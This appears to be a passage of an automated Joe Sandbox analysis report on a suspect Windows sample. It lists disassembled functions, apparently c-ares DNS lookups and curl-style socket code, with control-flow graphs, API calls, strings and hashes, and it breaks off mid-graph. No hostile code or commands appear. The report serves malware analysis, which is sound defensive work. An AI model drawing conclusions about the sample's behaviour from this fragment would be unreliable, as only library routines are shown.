1757 ceb50d-ceb52b call ceb770 * 2 1752->1757 1758 ceb4f7-ceb50b 1752->1758 1757->1704 1763 ceb52d-ceb531 1757->1763 1758->1704 1764 ceb533-ceb53b 1763->1764 1765 ceb580 1763->1765 1766 ceb53d-ceb547 1764->1766 1767 ceb578-ceb57e 1764->1767 1765->1704 1766->1767 1768 ceb549-ceb54d 1766->1768 1767->1704 1768->1767 1769 ceb54f-ceb558 1768->1769 1769->1767 1770 ceb55a-ceb576 call ceb870 * 2 1769->1770 1770->1704 1770->1767
                                                            APIs
                                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 00CEB2B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                                            • API String ID: 3358416759-2430778319
                                                            • Opcode ID: 3a4d474a20deb872eff45977c3da1b57d7a935d5fded0f23c5d7a4e313b9aa44
                                                            • Instruction ID: a9ffde1addbfa5f2d1a1f0923b23018218adab490b34c674e065fb9eba85ae4a
                                                            • Opcode Fuzzy Hash: 3a4d474a20deb872eff45977c3da1b57d7a935d5fded0f23c5d7a4e313b9aa44
                                                            • Instruction Fuzzy Hash: A6C18B716053569FD718DF26C881A7B77E1EF88314F048828F8598B3A2DB34EE45DB81
                                                            Function 00C36FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 878c906e3e738903c7fae4338495c0ae27ae91b363f23043b35f7fee776b6e1f
                                                            • Instruction ID: 70321f60e800f622cc685648469b1303a17582d8f1f861c13e3d9407a90edd2c
                                                            • Opcode Fuzzy Hash: 878c906e3e738903c7fae4338495c0ae27ae91b363f23043b35f7fee776b6e1f
                                                            • Instruction Fuzzy Hash: B49136B162D3098BD7358B29C8C47BBB2D5EFC4324F148B2CE8A9431D4EB759E40D681
                                                            Function 00CEA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00CD712E,?,?,?,00001001,00000000), ref: 00CEA90D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: recvfrom
                                                            • String ID:
                                                            • API String ID: 846543921-0
                                                            • Opcode ID: cd344a23ffefcd8144b4ba17041f18745a6ccc2af9117c153c6c7d90a0521f5b
                                                            • Instruction ID: b64e19a909e38d12b1dc337132ba80309e0ec4f299c14b80fe4267ee614a6aef
                                                            • Opcode Fuzzy Hash: cd344a23ffefcd8144b4ba17041f18745a6ccc2af9117c153c6c7d90a0521f5b
                                                            • Instruction Fuzzy Hash: 74F01D75118348AFD2209E42DC88D6BBBEDEFC9754F05495DF958132119271AE10CAB2
                                                            Function 00CDA440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00CDAA19
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00CDAA4C
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00CDAA97
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00CDAAE9
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00CDAB30
                                                            • RegCloseKey.KERNELBASE(?), ref: 00CDAB6A
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00CDAB82
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00CDAC46
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00CDAD0A
                                                            • RegEnumKeyExA.KERNELBASE ref: 00CDAD8D
                                                            • RegCloseKey.KERNELBASE(?), ref: 00CDADD9
                                                            • RegEnumKeyExA.KERNELBASE ref: 00CDAE08
                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00CDAE2A
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00CDAE54
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00CDAF63
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00CDAFB2
                                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00CDB072
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Open$CloseEnum
                                                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                            • API String ID: 4217438148-1047472027
                                                            • Opcode ID: b216bebb6d1f0480cd730a97a94ee7143a5b7ee554bf52d303f6088af4ad3df8
                                                            • Instruction ID: 910b367dbbb1f3860ff78ac2bd2b68d01010786b1561113424c233ecd5231af6
                                                            • Opcode Fuzzy Hash: b216bebb6d1f0480cd730a97a94ee7143a5b7ee554bf52d303f6088af4ad3df8
                                                            • Instruction Fuzzy Hash: 7B72DDB1604341ABE320DB24DC81B6BBBE8EF85700F14582DFA9597391EB75E944CB63
                                                            Function 00C5A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00C5A832
                                                            Strings
                                                            • Trying [%s]:%d..., xrefs: 00C5A689
                                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00C5AD0A
                                                            • cf_socket_open() -> %d, fd=%d, xrefs: 00C5A796
                                                            • Local Interface %s is ip %s using address family %i, xrefs: 00C5AE60
                                                            • Trying %s:%d..., xrefs: 00C5A7C2, 00C5A7DE
                                                            • @, xrefs: 00C5AC42
                                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 00C5AE1F
                                                            • Could not set TCP_NODELAY: %s, xrefs: 00C5A871
                                                            • Local port: %hu, xrefs: 00C5AF28
                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 00C5ADAC
                                                            • bind failed with errno %d: %s, xrefs: 00C5B080
                                                            • cf-socket.c, xrefs: 00C5A5CD, 00C5A735
                                                            • Bind to local port %d failed, trying next, xrefs: 00C5AFE5
                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00C5A6CE
                                                            • @, xrefs: 00C5A8F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: setsockopt
                                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3981526788-2373386790
                                                            • Opcode ID: 98a000ebc66e53dd0bb31d493b91eb563e959b03e153e1495f8eacb05fd8fa0a
                                                            • Instruction ID: 13c4f1f491a075259820587d68ffb2bd842b84d1fadb2922d7dcf4233cc8915d
                                                            • Opcode Fuzzy Hash: 98a000ebc66e53dd0bb31d493b91eb563e959b03e153e1495f8eacb05fd8fa0a
                                                            • Instruction Fuzzy Hash: 28622574508380ABE720CF15C846BABB7E4FF94305F044A19FD9897292E771E988CB93
                                                            Function 00CE9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 863 ce9740-ce975b 864 ce975d-ce9768 call ce78a0 863->864 865 ce9780-ce9782 863->865 873 ce976e-ce9770 864->873 874 ce99bb-ce99c0 864->874 867 ce9788-ce97a0 call fa8e00 call ce78a0 865->867 868 ce9914-ce994e call fa8b70 RegOpenKeyExA 865->868 867->874 878 ce97a6-ce97c5 867->878 876 ce995a-ce9992 RegQueryValueExA RegCloseKey call fa8b98 868->876 877 ce9950-ce9955 868->877 873->878 879 ce9772-ce977e 873->879 880 ce9a0c-ce9a15 874->880 891 ce9997-ce99b5 call ce78a0 876->891 877->880 886 ce9827-ce9833 878->886 887 ce97c7-ce97e0 878->887 879->867 892 ce985f-ce9872 call ce5ca0 886->892 893 ce9835-ce985c call cde2b0 * 2 886->893 889 ce97f6-ce9809 887->889 890 ce97e2-ce97f3 call fa8b50 887->890 889->886 903 ce980b-ce9810 889->903 890->889 891->874 891->878 904 ce9878-ce987d call ce77b0 892->904 905 ce99f0 892->905 893->892 903->886 908 ce9812-ce9822 903->908 912 ce9882-ce9889 904->912 907 ce99f5-ce99fb call ce5d00 905->907 917 ce99fe-ce9a09 907->917 908->880 912->907 916 ce988f-ce989b call cd4fe0 912->916 916->905 921 ce98a1-ce98c3 call fa8b50 call ce78a0 916->921 917->880 927 ce98c9-ce98db call cde2d0 921->927 928 ce99c2-ce99ed call cde2b0 * 2 921->928 927->928 932 ce98e1-ce98f0 call cde2d0 927->932 928->905 932->928 939 ce98f6-ce9905 call ce63f0 932->939 943 ce990b-ce990f 939->943 944 ce9f66-ce9f7f call ce5d00 939->944 945 ce9a3f-ce9a5a call ce6740 call ce63f0 943->945 944->917 945->944 952 ce9a60-ce9a6e call ce6d60 945->952 955 ce9a1f-ce9a39 call ce6840 call ce63f0 952->955 956 ce9a70-ce9a94 call ce6200 call ce67e0 call ce6320 952->956 955->944 955->945 967 ce9a16-ce9a19 956->967 968 ce9a96-ce9ac6 call cdd120 956->968 967->955 970 ce9fc1 967->970 973 ce9ac8-ce9adb call cdd120 968->973 974 ce9ae1-ce9af7 call cdd190 968->974 972 ce9fc5-ce9ffd call ce5d00 call cde2b0 * 2 970->972 972->917 973->955 973->974 974->955 982 ce9afd-ce9b09 call cd4fe0 974->982 982->970 988 ce9b0f-ce9b29 call cde730 982->988 992 ce9b2f-ce9b3a call ce78a0 988->992 993 ce9f84-ce9f88 988->993 992->993 1000 ce9b40-ce9b54 call cde760 992->1000 996 ce9f95-ce9f99 993->996 998 ce9f9b-ce9f9e 996->998 999 ce9fa0-ce9fb6 call cdebf0 * 2 996->999 998->970 998->999 1010 ce9fb7-ce9fbe 999->1010 1006 ce9f8a-ce9f92 1000->1006 1007 ce9b5a-ce9b6e call cde730 1000->1007 1006->996 1013 ce9b8c-ce9b97 call ce63f0 1007->1013 1014 ce9b70-cea004 1007->1014 1010->970 1020 ce9b9d-ce9bbf call ce6740 call ce63f0 1013->1020 1021 ce9c9a-ce9cab call cdea00 1013->1021 1019 cea015-cea01d 1014->1019 1022 cea01f-cea022 1019->1022 1023 cea024-cea045 call cdebf0 * 2 1019->1023 1020->1021 1040 ce9bc5-ce9bda call ce6d60 1020->1040 1032 ce9f31-ce9f35 1021->1032 1033 ce9cb1-ce9ccd call cdea00 call cde960 1021->1033 1022->972 1022->1023 1023->972 1035 ce9f37-ce9f3a 1032->1035 1036 ce9f40-ce9f61 call cdebf0 * 2 1032->1036 1051 ce9ccf 1033->1051 1052 ce9cfd-ce9d0e call cde960 1033->1052 1035->955 1035->1036 1036->955 1040->1021 1050 ce9be0-ce9bf4 call ce6200 call ce67e0 1040->1050 1050->1021 1071 ce9bfa-ce9c0b call ce6320 1050->1071 1053 ce9cd1-ce9cec call cde9f0 call cde4a0 1051->1053 1061 ce9d53-ce9d55 1052->1061 1062 ce9d10 1052->1062 1072 ce9cee-ce9cfb call cde9d0 1053->1072 1073 ce9d47-ce9d51 1053->1073 1065 ce9e69-ce9e8e call cdea40 call cde440 1061->1065 1066 ce9d12-ce9d2d call cde9f0 call cde4a0 1062->1066 1091 ce9e94-ce9eaa call cde3c0 1065->1091 1092 ce9e90-ce9e92 1065->1092 1088 ce9d2f-ce9d3c call cde9d0 1066->1088 1089 ce9d5a-ce9d6f call cde960 1066->1089 1083 ce9b75-ce9b86 call cdea00 1071->1083 1084 ce9c11-ce9c1c call ce7b70 1071->1084 1072->1052 1072->1053 1079 ce9dca-ce9ddb call cde960 1073->1079 1101 ce9e2e-ce9e36 1079->1101 1102 ce9ddd-ce9ddf 1079->1102 1083->1013 1110 ce9f2d 1083->1110 1084->1013 1105 ce9c22-ce9c33 call cde960 1084->1105 1088->1066 1113 ce9d3e-ce9d42 1088->1113 1116 ce9dc2 1089->1116 1117 ce9d71-ce9d73 1089->1117 1120 cea04a-cea04c 1091->1120 1121 ce9eb0-ce9eb1 1091->1121 1098 ce9eb3-ce9ec4 call cde9c0 1092->1098 1098->955 1123 ce9eca-ce9ed0 1098->1123 1107 ce9e3d-ce9e5b call cdebf0 * 2 1101->1107 1108 ce9e38-ce9e3b 1101->1108 1111 ce9e06-ce9e21 call cde9f0 call cde4a0 1102->1111 1132 ce9c66-ce9c75 call ce78a0 1105->1132 1133 ce9c35 1105->1133 1118 ce9e5e-ce9e67 1107->1118 1108->1107 1108->1118 1110->1032 1147 ce9e23-ce9e2c call cdeac0 1111->1147 1148 ce9de1-ce9dee call cdec80 1111->1148 1113->1065 1116->1079 1128 ce9d9a-ce9db5 call cde9f0 call cde4a0 1117->1128 1118->1065 1118->1098 1126 cea04e-cea051 1120->1126 1127 cea057-cea070 call cdebf0 * 2 1120->1127 1121->1098 1131 ce9ee5-ce9ef2 call cde9f0 1123->1131 1126->970 1126->1127 1127->1010 1161 ce9db7-ce9dc0 call cdeac0 1128->1161 1162 ce9d75-ce9d82 call cdec80 1128->1162 1131->955 1154 ce9ef8-ce9f0e call cde440 1131->1154 1150 ce9c7b-ce9c8f call cde7c0 1132->1150 1151 cea011 1132->1151 1140 ce9c37-ce9c51 call cde9f0 1133->1140 1140->1013 1177 ce9c57-ce9c64 call cde9d0 1140->1177 1165 ce9df1-ce9e04 call cde960 1147->1165 1148->1165 1150->1013 1172 ce9c95-cea00e 1150->1172 1151->1019 1175 ce9ed2-ce9edf call cde9e0 1154->1175 1176 ce9f10-ce9f26 call cde3c0 1154->1176 1181 ce9d85-ce9d98 call cde960 1161->1181 1162->1181 1165->1101 1165->1111 1172->1151 1175->955 1175->1131 1176->1175 1189 ce9f28 1176->1189 1177->1132 1177->1140 1181->1116 1181->1128 1189->970
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00CE9946
                                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00CE9974
                                                            • RegCloseKey.KERNELBASE(?), ref: 00CE998B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                            • API String ID: 3677997916-4129964100
                                                            • Opcode ID: 17295c9a76351156a8433828c274d237082754e690347d3887947470f80fce35
                                                            • Instruction ID: 67a87f39606ab1268fd64232a3bf1394836f1992c19fcec5aaa9f4be917ebd6a
                                                            • Opcode Fuzzy Hash: 17295c9a76351156a8433828c274d237082754e690347d3887947470f80fce35
                                                            • Instruction Fuzzy Hash: AF32C7F5904241ABEB11AB22EC42A1B76E8EF54354F084439F9199A363FB31EE14E753
                                                            Function 00C58B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1366 c58b50-c58b69 1367 c58be6 1366->1367 1368 c58b6b-c58b74 1366->1368 1369 c58be9 1367->1369 1370 c58b76-c58b8d 1368->1370 1371 c58beb-c58bf2 1368->1371 1369->1371 1372 c58bf3-c58bfe call c5a550 1370->1372 1373 c58b8f-c58ba7 call c36e40 1370->1373 1378 c58de4-c58def 1372->1378 1379 c58c04-c58c08 1372->1379 1380 c58bad-c58baf 1373->1380 1381 c58cd9-c58d16 SleepEx 1373->1381 1384 c58df5-c58e19 call c5a150 1378->1384 1385 c58e8c-c58e95 1378->1385 1382 c58dbd-c58dc3 1379->1382 1383 c58c0e-c58c1d 1379->1383 1386 c58bb5-c58bb9 1380->1386 1387 c58ca6-c58cb0 1380->1387 1402 c58d22 1381->1402 1403 c58d18-c58d20 1381->1403 1382->1369 1390 c58c35-c58c48 call c5a150 1383->1390 1391 c58c1f-c58c34 connect 1383->1391 1424 c58e88 1384->1424 1425 c58e1b-c58e26 1384->1425 1388 c58e97-c58e9c 1385->1388 1389 c58f00-c58f06 1385->1389 1386->1371 1394 c58bbb-c58bc2 1386->1394 1387->1381 1392 c58cb2-c58cb8 1387->1392 1396 c58edf-c58eef call c278b0 1388->1396 1397 c58e9e-c58eb6 call c32a00 1388->1397 1389->1371 1423 c58c4d-c58c4f 1390->1423 1391->1390 1398 c58ddc-c58dde 1392->1398 1399 c58cbe-c58cd4 call c5b180 1392->1399 1394->1371 1401 c58bc4-c58bcc 1394->1401 1420 c58ef2-c58efc 1396->1420 1397->1396 1422 c58eb8-c58edd call c33410 * 2 1397->1422 1398->1369 1398->1378 1399->1378 1409 c58bd4-c58bda 1401->1409 1410 c58bce-c58bd2 1401->1410 1405 c58d26-c58d39 1402->1405 1403->1405 1413 c58d43-c58d61 call c3d8c0 call c5a150 1405->1413 1414 c58d3b-c58d3d 1405->1414 1409->1371 1419 c58bdc-c58be1 1409->1419 1410->1371 1410->1409 1443 c58d66-c58d74 1413->1443 1414->1398 1414->1413 1426 c58dac-c58db8 call c650a0 1419->1426 1420->1389 1422->1420 1430 c58c51-c58c58 1423->1430 1431 c58c8e-c58c93 1423->1431 1424->1385 1432 c58e2e-c58e85 call 